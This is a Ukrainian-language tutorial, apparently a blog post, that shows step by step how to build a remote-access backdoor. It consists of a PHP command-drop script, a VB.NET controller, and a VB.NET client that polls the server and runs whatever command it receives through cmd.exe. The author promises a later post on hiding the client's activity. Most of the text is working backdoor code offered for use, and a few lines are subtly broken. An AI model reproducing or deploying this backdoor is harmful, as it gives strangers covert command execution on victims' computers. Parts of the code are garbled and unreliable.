Робимо virus VB .NET

13

Всім привіт) Як ви вже помітили, сьогодні розповім як написати свій бекдор «на будь-якій мові» (Якщо ви вмієте писати програми і у вас є фантазія).

Отже почнемо з того, що нам спочатку треба зробити в’язку адмінка-клієнт. Для цього ми використовуємо PHP , і всього лише 5 рядків коду)

Показати / Приховати текст
if ($_GET[‘cmd’] != «cmd_clear»)
{
$cmd = fopen(‘cmd.txt’, ‘w+’); //Створюємо порожній файл, якщо існує такий очищаємо його.
fwrite($cmd, $_GET[‘cmd’]); //пхаємо те, що в параметрі «cmd», а там як ми пам’ятаємо було «msg(HelloWorld!)»
fclose($cmd); //закриваємо за собою файл
}
else
{
$cmd = fopen(«cmd.txt», «w»); //Створюємо новий файл (тобто очищаємо наш cmd.txt)
fclose($cmd); //закриваємо за собою файл
}

Цей код я десь спиздил знайшов на просторах інтернету.
Даний код буде залишати команди для нашого бекдор)

Отже приступимо до адмінки, спочатку набросаєм на формі кнопку і текстбокс, і веббраузер, який я заліз на другу, форму, щоб він мені не заважав)

Робимо virus VB .NET

Далі перейдемо до коду

Вказуємо наш сайт, щоб він завантажувався при запуску програми) і оголошуємо його глобальної змінної

Робимо virus VB .NET Показати / Приховати текст
Public www As String
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
www = «http://localhost/»
End Sub

Оживимо кнопку, де ми говоримо передати GET запит на нашу адмінку на сайті, після cmd= наша команда) тег msg згодом потрібен буде для обробки клієнтом.

Робимо virus VB .NET Показати / Приховати текст
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Form2.WebBrowser1.Navigate(www & «rat/admin.php?cmd=< msg>» & TextBox1.Text & «< /msg>«)
TextBox1.Text = «»
End Sub

Наша адмінка готова)

Перейдемо до клієнта) нічого не кидаємо на форму, крім таймера)

Давайте пропишемо роботу таймера за яким наша програма буде перевіряти сайт (файл cmd.txt) ну і звичайно таймер запускається разом з програмою)) Так само як і в адмінці, оголосимо глобальні змінні, тепер їх дві, а ще нам потрібно підключити дві бібліотеки

Робимо virus VB .NET Показати / Приховати текст
Imports System.Text
Imports System.IO
Public WC As New System.Net.WebClient
Public www As String
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
www = «http://localhost/»
Timer1.Enabled = True
Timer1.Interval = 5000
End Sub

Для зручності я зробив штучну затримку

Робимо virus VB .NET Показати / Приховати текст
Робимо virus VB .NET

Ну і тепер код самого таймера, тобто те, що має статися ) Спочатку отпарсим наші дані) для цього ми і вказували тег msg , ну а далі командою Shell запускаємо командний рядок із зазначеними командами)

Робимо virus VB .NET Показати / Приховати текст
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
Dim R() As String = {«»}
Dim L() As String = {«»}
Dim myHttpWebRequest As Net.HttpWebRequest = Net.HttpWebRequest.Create(www & «rat/cmd.txt»)
Dim myHttpWebResponse As Net.HttpWebResponse = myHttpWebRequest.GetResponse()
Dim myStreamReader As New IO.StreamReader(myHttpWebResponse.GetResponseStream, System.Text.Encoding.GetEncoding(1251))
Dim Str As String = myStreamReader.ReadToEnd()
If InStr(Str, R(0)) 0 Then
Dim Tmp As String = Str.Split(R, StringSplitOptions.None)(1)
Dim Res As String = Tmp.Split(L, StringSplitOptions.None)(0)
WC.DownloadString(www & «rat/admin.php?cmd=clear_cmd»)
Wait(2)
Shell(«cmd.exe « + Res)
Else
End If
End Sub

P. S. якщо вам цікава ця стаття, то наступного разу я зроблю статтю про те, як приховати дії нашого клієнта.